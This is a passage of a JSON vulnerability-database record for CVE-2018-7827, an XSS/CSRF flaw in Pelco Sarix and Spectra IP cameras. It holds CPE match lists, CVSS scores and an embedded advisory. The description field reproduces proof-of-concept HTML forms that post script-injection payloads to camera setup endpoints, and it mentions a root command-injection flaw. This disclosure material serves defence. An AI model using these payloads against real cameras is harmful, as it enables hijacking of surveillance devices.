],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixes1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixes1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe11_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe11:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe31_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe31:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7827",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-7827",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CNVD-2019-16260",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-7827",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7827",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16260",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-910",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Cross-Site Scripting (XSS) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which a remote attacker can execute arbitrary HTML and script code in a user\u2019s browser session. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" 